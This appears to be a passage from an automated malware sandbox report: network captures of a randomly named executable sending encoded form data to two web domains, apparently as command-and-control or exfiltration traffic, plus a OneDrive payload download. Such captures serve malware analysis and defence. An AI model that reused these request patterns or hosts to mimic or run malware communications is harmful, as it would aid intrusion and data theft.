                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.54973284.32.84.121801600C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 23, 2024 14:50:45.114217997 CEST1856OUTPOST /ktbm/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.kosherphonestore.com
                                                            Origin: http://www.kosherphonestore.com
                                                            Referer: http://www.kosherphonestore.com/ktbm/
                                                            Content-Length: 1240
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                                            Data Raw: 6f 42 47 3d 51 41 36 55 59 46 54 2b 5a 68 62 66 72 71 48 46 6e 69 4b 59 4d 65 50 72 6b 76 56 7a 64 55 75 59 69 75 34 63 53 36 35 6c 77 62 34 6b 48 47 63 2f 52 64 61 6d 35 33 44 61 78 43 33 67 33 76 44 49 76 6c 47 4f 78 61 47 2f 6c 78 66 77 33 4c 61 6d 62 48 53 49 57 39 32 63 44 63 2f 42 31 66 77 43 77 61 32 37 67 52 2b 5a 52 55 6a 31 35 56 32 56 49 56 67 54 49 6f 52 47 68 65 68 38 6b 38 4c 4b 4f 76 4c 78 78 39 6d 37 59 6d 77 69 35 72 59 77 49 53 73 4c 61 68 6c 75 38 76 42 6f 45 74 65 67 42 36 78 6b 5a 61 38 6c 6f 75 30 43 51 33 39 68 32 55 35 67 39 76 67 39 48 73 4d 70 7a 38 38 63 77 34 32 74 74 42 79 79 37 58 4c 6d 63 4f 63 74 30 65 36 56 66 38 51 58 45 46 43 59 72 4c 4a 59 32 57 55 33 52 57 59 52 59 50 51 70 67 51 53 34 6d 4e 52 39 67 78 6b 56 72 4c 39 4b 4e 74 4c 49 74 73 4c 56 45 65 36 66 34 6b 7a 43 4d 6e 4a 61 53 43 37 79 4b 72 39 4f 72 47 61 43 54 42 69 49 50 65 6d 5a 41 34 6e 55 4e 61 42 7a 63 46 58 44 6c 6b 33 65 62 4b 61 68 55 73 5a 6c 70 7a 33 50 4c 43 44 66 69 77 66 37 69 54 70 6f 67 73 [TRUNCATED]
                                                            Data Ascii: oBG=QA6UYFT+ZhbfrqHFniKYMePrkvVzdUuYiu4cS65lwb4kHGc/Rdam53DaxC3g3vDIvlGOxaG/lxfw3LambHSIW92cDc/B1fwCwa27gR+ZRUj15V2VIVgTIoRGheh8k8LKOvLxx9m7Ymwi5rYwISsLahlu8vBoEtegB6xkZa8lou0CQ39h2U5g9vg9HsMpz88cw42ttByy7XLmcOct0e6Vf8QXEFCYrLJY2WU3RWYRYPQpgQS4mNR9gxkVrL9KNtLItsLVEe6f4kzCMnJaSC7yKr9OrGaCTBiIPemZA4nUNaBzcFXDlk3ebKahUsZlpz3PLCDfiwf7iTpogsmfWfa60vOSftLtiA31KAMUbmrtPQFaz5L+FDd0SVsE43i6ufIDay2l09HwX50iwuYF/Vh9m6vwwZv3CVt6LtymsWfOaGin319/H+01B4v093f6H1J/X1OB+4DY40X5GRgi6Sqfk6AwTKpcVmmwU+9n6X5YrBnArbKUU/xML3X7HFvcIcO6JvMiAVAZlmRZV/EHuyU7FZ6lBuriWQe8GvFUOfZURMKTOcqJddAuJ1F+Adjr6ynYTGtEDo62VsN+Y+Kcin6tWkaXr0mYEKP1vyR44B+Bzoseis/clzDdJslbHdt1943tqzXErhcKu254Bx7LbVKcuSZ1FJCuZGwASvlQkOOmo2pYGM1Os5Lhy0Agh/QYmF7gK0qpTU4Q7Bnx0EEtLatmuky0MFc+x/6FDev0IovW5uvabtV9gO+AEDU2X9P1IxpxcqjPb40TGNqF/E+0pDYrv9yUbWE1lz6b0mANzH5udFGAqunl8soZFDrgUFzrmx6qUmOOENIIjtN0vmz6MI7wSaO5H1LuRWBRnpyirVSoK+Euvkq/Mfos4b5VZDJQJanHbQiuDjC8OqtGXZJNYv+CDjuAGKSMVj0EqFoNAQ+TR/shYkwjjkHPuNDrlmVZnrWssOrwER7ph7cM7LY9cFLEPnvgBInSTfxZSbiGXPSrcBePstO2 [TRUNCATED]
                                                            Jul 23, 2024 14:50:45.608026028 CEST1218INHTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Tue, 23 Jul 2024 12:50:45 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.kosherphonestore.com/ktbm/
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: d4311b9f9126d77879543371cf365a3a-bos-edge2
                                                            x-hcdn-cache-status: DYNAMIC
                                                            x-hcdn-upstream-rt: 0.001
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.54973484.32.84.121801600C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 23, 2024 14:50:47.676683903 CEST543OUTGET /ktbm/?oBG=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&3F=ZLtxCXoX HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.kosherphonestore.com
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                                            Jul 23, 2024 14:50:48.333549023 CEST1236INHTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Tue, 23 Jul 2024 12:50:48 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.kosherphonestore.com/ktbm/?oBG=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&3F=ZLtxCXoX
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: 74467f51a2cd8674a3d2c46eed47e08f-bos-edge2
                                                            x-hcdn-cache-status: MISS
                                                            x-hcdn-upstream-rt: 0.001
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin
                                                            Jul 23, 2024 14:50:48.333570957 CEST128INData Raw: 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d
                                                            Data Ascii: -top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                            Jul 23, 2024 14:50:48.569380999 CEST1236INHTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Tue, 23 Jul 2024 12:50:48 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.kosherphonestore.com/ktbm/?oBG=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&3F=ZLtxCXoX
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: 74467f51a2cd8674a3d2c46eed47e08f-bos-edge2
                                                            x-hcdn-cache-status: MISS
                                                            x-hcdn-upstream-rt: 0.001
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.54973943.155.26.241801600C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 23, 2024 14:50:53.828190088 CEST798OUTPOST /kwl6/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.cwgehkk.store
                                                            Origin: http://www.cwgehkk.store
                                                            Referer: http://www.cwgehkk.store/kwl6/
                                                            Content-Length: 204
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                                            Data Raw: 6f 42 47 3d 58 34 63 6e 73 31 2b 59 73 37 47 35 33 4f 38 77 56 75 6a 76 47 52 4a 37 34 77 31 66 59 6d 72 70 66 43 78 4a 73 47 53 46 42 38 4c 56 66 72 61 55 4a 45 57 76 50 72 38 6d 38 67 42 61 43 63 44 56 4f 54 64 62 78 38 66 73 42 72 54 6b 69 2f 4f 52 39 68 48 44 63 4d 73 6d 64 4e 63 4c 41 4e 4f 42 65 6b 73 64 51 4f 51 58 6b 64 58 57 55 41 56 4f 7a 78 6e 45 2f 4d 51 79 43 59 4f 72 43 34 43 79 65 78 4d 58 64 64 67 75 6a 36 52 4c 48 72 66 55 6d 4c 48 72 61 66 56 2b 65 2b 4b 66 68 55 2b 52 7a 65 6d 73 44 42 5a 39 5a 55 4f 47 4d 78 56 76 55 61 5a 44 45 63 53 4f 6b 4c 51 69 5a 52 66 4a 6e 65 37 37 50 6e 49 3d
                                                            Data Ascii: oBG=X4cns1+Ys7G53O8wVujvGRJ74w1fYmrpfCxJsGSFB8LVfraUJEWvPr8m8gBaCcDVOTdbx8fsBrTki/OR9hHDcMsmdNcLANOBeksdQOQXkdXWUAVOzxnE/MQyCYOrC4CyexMXddguj6RLHrfUmLHrafV+e+KfhU+RzemsDBZ9ZUOGMxVvUaZDEcSOkLQiZRfJne77PnI=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.54974243.155.26.241801600C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 23, 2024 14:50:56.363245964 CEST818OUTPOST /kwl6/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.cwgehkk.store
                                                            Origin: http://www.cwgehkk.store
                                                            Referer: http://www.cwgehkk.store/kwl6/
                                                            Content-Length: 224
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                                            Data Raw: 6f 42 47 3d 58 34 63 6e 73 31 2b 59 73 37 47 35 32 75 73 77 51 50 6a 76 52 68 4a 34 33 51 31 66 52 47 71 67 66 43 39 4a 73 43 6a 65 43 4f 76 56 63 4c 71 55 49 42 69 76 4f 72 38 6d 79 41 42 66 47 63 43 62 4f 54 51 37 78 39 7a 73 42 72 33 6b 69 2b 2b 52 38 57 72 41 64 63 73 34 53 74 63 4a 4f 74 4f 42 65 6b 73 64 51 4f 30 74 6b 64 50 57 55 56 64 4f 77 51 6e 44 68 63 52 41 42 59 4f 72 54 6f 43 32 65 78 4d 68 64 63 38 41 6a 2f 56 4c 48 75 37 55 6e 66 54 6f 56 66 56 30 52 65 4c 53 74 6c 50 47 35 73 6d 65 50 79 51 42 47 46 2b 61 4a 48 34 46 4f 34 52 72 58 38 2b 32 30 59 59 56 49 68 2b 67 39 39 72 4c 52 77 63 65 51 69 62 31 6f 42 6f 43 45 50 73 61 6a 33 78 78 4c 71 6e 76
                                                            Data Ascii: oBG=X4cns1+Ys7G52uswQPjvRhJ43Q1fRGqgfC9JsCjeCOvVcLqUIBivOr8myABfGcCbOTQ7x9zsBr3ki++R8WrAdcs4StcJOtOBeksdQO0tkdPWUVdOwQnDhcRABYOrToC2exMhdc8Aj/VLHu7UnfToVfV0ReLStlPG5smePyQBGF+aJH4FO4RrX8+20YYVIh+g99rLRwceQib1oBoCEPsaj3xxLqnv


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.54974443.155.26.241801600C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 23, 2024 14:50:58.908078909 CEST1835OUTPOST /kwl6/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.cwgehkk.store
                                                            Origin: http://www.cwgehkk.store
                                                            Referer: http://www.cwgehkk.store/kwl6/
                                                            Content-Length: 1240
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                                            Data Raw: 6f 42 47 3d 58 34 63 6e 73 31 2b 59 73 37 47 35 32 75 73 77 51 50 6a 76 52 68 4a 34 33 51 31 66 52 47 71 67 66 43 39 4a 73 43 6a 65 43 4f 6e 56 63 36 4b 55 49 6d 4f 76 63 37 38 6d 36 67 42 65 47 63 43 57 4f 54 59 6b 78 39 76 57 42 74 7a 6b 6a 59 43 52 74 58 72 41 58 63 73 34 4b 64 63 49 41 4e 50 62 65 6b 38 5a 51 4f 6b 74 6b 64 50 57 55 53 74 4f 6b 78 6e 44 6a 63 51 79 43 59 4f 5a 43 34 43 4b 65 78 55 66 64 64 49 2b 6a 72 68 4c 48 4f 72 55 68 70 76 6f 4b 76 56 79 51 65 4b 42 74 6c 43 42 35 73 37 6c 50 78 4d 2f 47 43 4b 61 4c 44 46 73 55 61 64 39 41 64 79 42 36 37 41 72 4b 6d 76 45 32 76 37 73 4f 6a 4d 45 51 79 50 6f 76 48 4a 46 4e 4d 5a 47 34 6d 4a 52 46 2b 65 36 37 6e 46 32 47 6e 6a 77 66 4e 43 73 61 68 32 50 62 66 59 75 4e 4c 55 70 34 6b 2b 47 75 61 46 59 71 4b 2b 57 32 57 37 32 62 74 50 38 6b 72 69 70 2b 74 33 56 37 75 61 45 56 56 56 45 74 48 46 4c 78 54 67 2f 6c 56 65 61 53 42 65 6a 79 6d 63 73 52 53 42 49 41 32 6d 30 67 36 6c 34 5a 56 44 6e 4e 74 31 63 52 41 44 65 52 79 4b 6e 34 76 4c 63 5a 62 [TRUNCATED]
                                                            Data Ascii: oBG=X4cns1+Ys7G52uswQPjvRhJ43Q1fRGqgfC9JsCjeCOnVc6KUImOvc78m6gBeGcCWOTYkx9vWBtzkjYCRtXrAXcs4KdcIANPbek8ZQOktkdPWUStOkxnDjcQyCYOZC4CKexUfddI+jrhLHOrUhpvoKvVyQeKBtlCB5s7lPxM/GCKaLDFsUad9AdyB67ArKmvE2v7sOjMEQyPovHJFNMZG4mJRF+e67nF2GnjwfNCsah2PbfYuNLUp4k+GuaFYqK+W2W72btP8krip+t3V7uaEVVVEtHFLxTg/lVeaSBejymcsRSBIA2m0g6l4ZVDnNt1cRADeRyKn4vLcZb+C/ycaFNntM+IbAB7jyh7UiBqlvX+g01d4MEboE8j42B4b0ezpVsU0IlnLHWhaO1bXS5piV8jOnmhmHUWSJ2EizhJcOaKr5De9+cfEXdSF0hiAEAxaIMuV40p3Zow1jgdCMmObQxvR8ea1+q5JEWUqiw9AqxeEm+umyN3ai4BYd0duRiTz/VewCYYvqXR6vcMqUvDhyyjz+BnknlzTidBSa6mFcab45zQQdyv/Rf7f5RcljH9MqgjUV/VrclrCkTFCwZ+plwMNePRSQfVmVMyuWWlwzMAcGHfEbPMOx9HXXTP+i3Kv4t22MahR3WPldiTdiR6Am1UoDBpZGpiQEYyhlv6X0epcAIWj5Bw4CCjXrSMBmMCJdpLtjV/gULDft7oxosfYDA6HV6x+o+nHtLchobJFTKQ/hxHrDLAn4IJ5yGmOW+dV4uhD/o4JXEd335m6B082hR/05w8foaW89HY9tKHl0JSv0PIp2oZONBlZgTmWv2o2I7Aom+SEUyaMPUJ6y/Xqo2mwhs0NU7+kiqCv2SqGylA/sY6o2P6TGI2FdVpNOtZQ0h4ZtrwoUU64Zpu4EtpuneJthNk8VT+acnMp6rkvDjgzPP/XHb+/GogUP4Ix8NglXOnFZOSFc2dIj+40iKefd//Gn3pxcUSqNDmsUYcXkbnizOYF [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.54974643.155.26.241801600C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 23, 2024 14:51:01.440617085 CEST536OUTGET /kwl6/?3F=ZLtxCXoX&oBG=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA== HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.cwgehkk.store
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.54970413.107.137.114434416C:\Users\user\Desktop\4Ear91jgQ7.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-23 12:49:18 UTC131OUTGET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            2024-07-23 12:49:18 UTC1166INHTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mxEYTjyjp5LfgrlSoxPuo-qFG-8J5AXctRyKSa4F8HTVl2y0jju6xUKiA_toKgQU3XKSLq2mvSzYTkAdNcGbO3lvQDjwGCNX6f5opDmIAdm52vOSlaKsdGBDd1BEVvBGlENE-DFpAecxHCicQpqY-yiQmmGUhcKrKtEdGoY6JFwiOBu7IIolGtBighwA0QHWJfTaN6zBw6uAOr6k9PDj-3w/1336?download&psid=1
                                                            Set-Cookie: E=P:AkSx3RWr3Ig=:Q5BzX0ZBA3mWzpssx0Kj3y33On7C3kN0lnOCoJ7m8iM=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=17381c14-b7b1-45ab-8d56-2dbc68f5c1a8&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
